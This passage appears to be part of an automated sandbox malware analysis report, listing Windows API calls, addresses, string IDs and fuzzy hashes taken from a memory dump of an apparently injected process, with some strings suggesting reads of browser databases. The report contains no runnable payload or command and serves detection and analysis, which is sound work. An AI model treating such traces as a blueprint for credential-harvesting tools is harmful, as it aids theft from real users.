                                                                                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                                                                • memcpy.MSVCRT ref: 0040B159
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$memcpy$mallocstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1171893557-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004144E7
                                                                                                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                  • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                • memset.MSVCRT ref: 0041451A
                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1127616056-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memset
                                                                                                                • String ID: sqlite_master
                                                                                                                • API String ID: 438689982-3163232059
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3917621476-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                • wcscat.MSVCRT ref: 0041101F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 822687973-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                                                                • malloc.MSVCRT ref: 00417459
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 4284152360-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2678498856-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Item
                                                                                                                • String ID:
                                                                                                                • API String ID: 3888421826-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00417B7B
                                                                                                                • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3727323765-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                • malloc.MSVCRT ref: 00417407
                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 4284152360-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040F673
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                • strlen.MSVCRT ref: 0040F6A2
                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2754987064-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040F6E2
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                • strlen.MSVCRT ref: 0040F70D
                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2754987064-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00402FD7
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                • strlen.MSVCRT ref: 00403006
                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2754987064-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 764393265-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$System$File$LocalSpecific
                                                                                                                • String ID:
                                                                                                                • API String ID: 979780441-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memcpy.MSVCRT ref: 004134E0
                                                                                                                • memcpy.MSVCRT ref: 004134F2
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                                                • String ID:
                                                                                                                • API String ID: 1386444988-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InvalidateMessageRectSend
                                                                                                                • String ID: d=E
                                                                                                                • API String ID: 909852535-3703654223
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 0040F79E
                                                                                                                • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcschr$memcpywcslen
                                                                                                                • String ID: "
                                                                                                                • API String ID: 1983396471-123907689
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                • memcpy.MSVCRT ref: 0040C024
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FilePointer_memicmpmemcpy
                                                                                                                • String ID: URL
                                                                                                                • API String ID: 2108176848-3574463123
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfmemcpy
                                                                                                                • String ID: %2.2X
                                                                                                                • API String ID: 2789212964-323797159
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf
                                                                                                                • String ID: %%-%d.%ds
                                                                                                                • API String ID: 3988819677-2008345750
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040E770
                                                                                                                • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendmemset
                                                                                                                • String ID: F^@
                                                                                                                • API String ID: 568519121-3652327722
                                                                                                                • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PlacementWindowmemset
                                                                                                                • String ID: WinPos
                                                                                                                • API String ID: 4036792311-2823255486
                                                                                                                • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                • String ID: _lng.ini
                                                                                                                • API String ID: 383090722-1948609170
                                                                                                                • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                • API String ID: 2773794195-880857682
                                                                                                                • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 438689982-0
                                                                                                                • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1860491036-0
                                                                                                                • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memcmp.MSVCRT ref: 00408AF3
                                                                                                                  • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                                                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                                                                                • memcmp.MSVCRT ref: 00408B2B
                                                                                                                • memcmp.MSVCRT ref: 00408B5C
                                                                                                                • memcpy.MSVCRT ref: 00408B79
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcmp$memcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 231171946-0
                                                                                                                • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcslen$wcscat$wcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1961120804-0
                                                                                                                • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:2.4%
                                                                                                                Dynamic/Decrypted Code Coverage:20.4%
                                                                                                                Signature Coverage:0.5%
                                                                                                                Total number of Nodes:849
                                                                                                                Total number of Limit Nodes:16
